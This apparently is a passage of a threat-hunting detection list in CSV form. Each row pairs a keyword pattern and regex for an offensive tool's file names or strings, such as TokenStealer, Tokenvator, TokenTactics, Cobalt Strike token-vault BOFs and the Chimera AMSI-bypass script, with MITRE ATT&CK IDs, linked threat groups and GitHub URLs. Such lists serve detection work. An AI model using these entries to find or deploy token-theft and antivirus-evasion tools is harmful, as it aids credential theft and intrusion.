"*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61405"
"*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61406"
"*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61407"
"*Token-Impersonation.ps1*",".{0,1000}Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61408"
"*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","61409"
"*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","61410"
"*TokenKidnapping.exe*",".{0,1000}TokenKidnapping\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","61411"
"*TokenPlayer-v0.3.exe*",".{0,1000}TokenPlayer\-v0\.3\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61412"
"*TokenPlayer-v0.4.exe*",".{0,1000}TokenPlayer\-v0\.4\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61413"
"*TokenPlayer-v0.5.exe*",".{0,1000}TokenPlayer\-v0\.5\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61414"
"*TokenPlayer-v0.6.exe*",".{0,1000}TokenPlayer\-v0\.6\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61415"
"*TokenPlayer-v0.7.exe*",".{0,1000}TokenPlayer\-v0\.7\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61416"
"*TokenPlayer-v0.8.exe*",".{0,1000}TokenPlayer\-v0\.8\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61417"
"*tokenprivs.cpp*",".{0,1000}tokenprivs\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61418"
"*tokenprivs.exe*",".{0,1000}tokenprivs\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61419"
"*Tokens were extracted to tokens.txt! Enjoy*",".{0,1000}Tokens\swere\sextracted\sto\stokens\.txt!\sEnjoy.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","#content","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","61420"
"*TokenStealer.cpp*",".{0,1000}TokenStealer\.cpp.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61421"
"*TokenStealer.exe*",".{0,1000}TokenStealer\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61422"
"*TokenStealer.sln*",".{0,1000}TokenStealer\.sln.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61423"
"*TokenStealer.vcxproj*",".{0,1000}TokenStealer\.vcxproj.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61424"
"*TokenStealer-master*",".{0,1000}TokenStealer\-master.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61425"
"*TokenStealing.cs*",".{0,1000}TokenStealing\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61426"
"*TokenStealing.exe*",".{0,1000}TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61427"
"*TokenStomp.exe*",".{0,1000}TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61428"
"*TokenStripBOF/src*",".{0,1000}TokenStripBOF\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","61429"
"*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61430"
"*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","61431"
"*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61432"
"*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","61433"
"*TokenTactics-main.zip*",".{0,1000}TokenTactics\-main\.zip.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61434"
"*TokenUniverse.dproj*",".{0,1000}TokenUniverse\.dproj.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61435"
"*TokenUniverse.exe*",".{0,1000}TokenUniverse\.exe.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61436"
"*TokenUniverse-master.zip*",".{0,1000}TokenUniverse\-master\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61437"
"*TokenUniverse-x64.zip*",".{0,1000}TokenUniverse\-x64\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61438"
"*TokenUniverse-x86.zip*",".{0,1000}TokenUniverse\-x86\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61439"
"*Tokenvator*",".{0,1000}Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61440"
"*Tokenvator*.exe*",".{0,1000}Tokenvator.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61441"
"*Tokenvator.csproj*",".{0,1000}Tokenvator\.csproj.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61442"
"*Tokenvator.exe*",".{0,1000}Tokenvator\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61443"
"*Tokenvator.git*",".{0,1000}Tokenvator\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61444"
"*Tokenvator.pdb*",".{0,1000}Tokenvator\.pdb.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61445"
"*Tokenvator.Plugins*",".{0,1000}Tokenvator\.Plugins.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61446"
"*Tokenvator.Resources*",".{0,1000}Tokenvator\.Resources.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61447"
"*Tokenvator.sln*",".{0,1000}Tokenvator\.sln.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61448"
"*Tokenvator/MonkeyWorks*",".{0,1000}Tokenvator\/MonkeyWorks.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61449"
"*token-vault steal*",".{0,1000}token\-vault\ssteal.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61450"
"*token-vault.cna*",".{0,1000}token\-vault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61451"
"*token-vault.x64.o*",".{0,1000}token\-vault\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61452"
"*token-vault.x86.o*",".{0,1000}token\-vault\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61453"
"*TokenViewer.exe*",".{0,1000}TokenViewer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61454"
"*tokyoneon/Chimera*",".{0,1000}tokyoneon\/Chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","61455"
"*tomcarver16/ADSearch*",".{0,1000}tomcarver16\/ADSearch.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","61456"
